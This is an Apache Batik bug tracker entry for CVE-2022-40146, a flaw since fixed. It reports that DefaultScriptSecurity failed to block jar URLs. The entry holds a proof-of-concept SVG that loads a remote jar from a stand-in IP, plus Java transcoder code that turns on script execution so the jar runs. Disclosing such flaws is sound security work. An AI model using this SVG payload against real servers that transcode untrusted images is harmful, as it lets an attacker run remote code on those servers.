Uploaded image for project: 'Batik'
  1. Batik
  2. BATIK-1335

Jar url should be blocked by DefaultScriptSecurity

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Resolved
    • Major
    • Resolution: Fixed
    • None
    • 1.15
    • None
    • None

    Description

      Only affects the batik-bridge component

      <svg xmlns="http://www.w3.org/2000/svg"
      xmlns:xlink="http://www.w3.org/1999/xlink" width="450" height="500"
      viewBox="0 0 450 500">
      <script type="application/java-archive"
      xlink:href="jar:http://192.168.1.10/poc.jar!/"></script>
      </svg>

      should be blocked when using:

      JPEGTranscoder t = new JPEGTranscoder();
      t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
      t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, "application/java-archive,");
      FileInputStream stream = new FileInputStream("test.svg");
      TranscoderInput input = new TranscoderInput(stream);
      FileOutputStream fos = new FileOutputStream("out.jpg");
      TranscoderOutput output = new TranscoderOutput(fos);
      t.transcode(input, output);
      fos.close();

      CVE-2022-40146

      Attachments

        Activity

          People

            ssteiner Simon Steiner
            ssteiner Simon Steiner
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: